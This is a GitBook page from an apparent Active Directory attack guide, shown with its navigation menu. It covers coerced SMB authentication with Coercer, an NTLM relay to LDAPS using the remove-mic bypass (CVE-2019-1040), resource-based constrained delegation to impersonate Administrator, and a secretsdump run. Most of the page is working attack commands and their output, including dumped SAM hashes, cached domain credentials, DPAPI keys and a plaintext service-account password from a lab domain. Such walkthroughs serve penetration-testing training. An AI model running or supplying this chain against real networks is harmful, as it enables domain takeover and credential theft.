Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • Installation
  • Start the Relay
  • LEt's corece
  1. Exploiting With Poison and Relay

Coerced auth smb + ntlmrelayx to ldaps with drop the mic

PreviousPass the Hash with CrackMapExecNextUser Enumeration Exploit

Last updated 2 years ago

We can coerce a connection from Baltimore DC to our host using multiple methods (petitpotam, printerbug, DFSCoerce). To force a coerce without choosing between the different methods, we can use the all-in-one tool who just came up coercer

As explained beautifully in the hackndo blog (en.hackndo.com/ntlm-relay) and in the hacker receipe (www.thehacker.recipes/ad/movement/ntlm/relay), you can’t relay smb connection to ldap(s) connection without using CVE-2019-1040 a.k.a remove-mic.

  • Start the relay with remove mic to the ldaps of baltimore.maryland.local.

  • Run the coerce authentication on Salsibury(Salisbury is a windows server 2016 up to date so petitpotam unauthenticated will not work here)

Installation

You can now install it from pypi (latest version is ) with this command:

sudo python3 -m pip install coercer

Collecting coercer
  Downloading coercer-2.4-py3-none-any.whl (49 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 49.1/49.1 kB 136.3 kB/s eta 0:00:00
Requirement already satisfied: xlsxwriter in /usr/lib/python3/dist-packages (from coercer) (3.0.2)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from coercer) (0.10.0)
Requirement already satisfied: jinja2 in /usr/lib/python3/dist-packages (from coercer) (3.0.3)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->coercer) (1.2.4)
Installing collected packages: coercer
Successfully installed coercer-2.4
 
 *] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.56.23, attacking target ldaps://baltimore.maryland.local
[*] Authenticating against ldaps://baltimore.maryland.local as MARYLAND/SALISBURY$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-7: Connection from 192.168.56.23 controlled, but there are no more targets left!
[*] Attempting to create computer in: CN=Computers,DC=maryland,DC=local
[*] Adding new computer with username: removemiccomputer$ and password: *mHcnugW1<KF8Oq result: OK
[*] Delegation rights modified succesfully!
[*] removemiccomputer$ can now impersonate users on SALISBURY$ via S4U2Proxy

Start the Relay

sudo ntlmrelayx.py -t ldaps://baltimore.maryland.local -smb2support --remove-mic --add-computer removemiccomputer --delegate-access

LEt's corece

Coercer coerce -u joaquin.Pereida -d maryland.local -p horse -t salisbury.maryland.local -l 192.168.56.31

  • The attack worked we can now exploit Salisbury with RBCD by getting the service principal name -spn for Administrator

sudo getST.py -spn HOST/salisbury.maryland.local -impersonate Administrator -dc-ip 192.168.56.12 'MARYLAND.LOCAL/removemiccomputer$:*mHcnugW1<KF8Oq'
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

  • and use that ticket to retrieve dump the sam database from Salisbury Server..

export KRB5CCNAME=/workspace/Administrator.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'Administrator'@salisbury.maryland.local'




Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e6d1ece16a534e660a94480bd6f2a32
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:84fe45d7c3263065e931761aef6c7aaf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARYLAND.LOCAL/sql_svc:$DCC2$10240#sql_svc#89e701ebbd305e4f5380c5150494584a
MARYLAND.LOCAL/joaquin.Pereida:$DCC2$10240#joaquin.Pereida#39dfbbbb2ff73c019c37498e96708c37
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
maryland\SALISBURY$:plain_password_hex:2100480079004f0060003800600078002b006300270058003e0056004f003c003c004a005100520039005e007a0043005b004d0038005000390073004b00780057003e004800300026004c003b0040004300330055003b00450045006900260046006400700031004c002e00450028002300290045006e0074003d005f005500550051002300760073004a0031002b0078004c0055002100500043004f005b00380072006b005a002d0055002000230032005e004d005a006a006900470044002e0066003c003a0040004b00310079002f0075002e0078005a0063002a002f00690052006f0034003800700041003800
maryland\SALISBURY$:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0810ead1cae293ee405b7051a9d3a3a3b8afbc0b
dpapi_userkey:0x39f7f79d4d6d8889ba4f1c5bf55a42429702eded
[*] NL$KM 
 0000   26 72 00 BB 64 CB DD D7  34 20 B4 AC 7E 9A 99 05   &r..d...4 ..~...
 0010   75 95 40 EF C7 ED 72 3E  F4 66 93 E7 3D C9 B8 56   u.@...r>.f..=..V
 0020   EC E8 6E 4E 40 13 86 34  A8 F6 E6 36 C6 71 9F 7A   ..nN@..4...6.q.z
 0030   8F 63 A3 23 D9 37 A0 BC  07 C0 0B 06 41 21 5E 64   .c.#.7......A!^d
NL$KM:267200bb64cbddd73420b4ac7e9a9905759540efc7ed723ef46693e73dc9b856ece86e4e40138634a8f6e636c6719f7a8f63a323d937a0bc07c00b0641215e64
[*] _SC_MSSQL$SQLEXPRESS 
maryland.local\sql_svc:YouWillNotKerboroast1ngMeeeeee
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
PyPI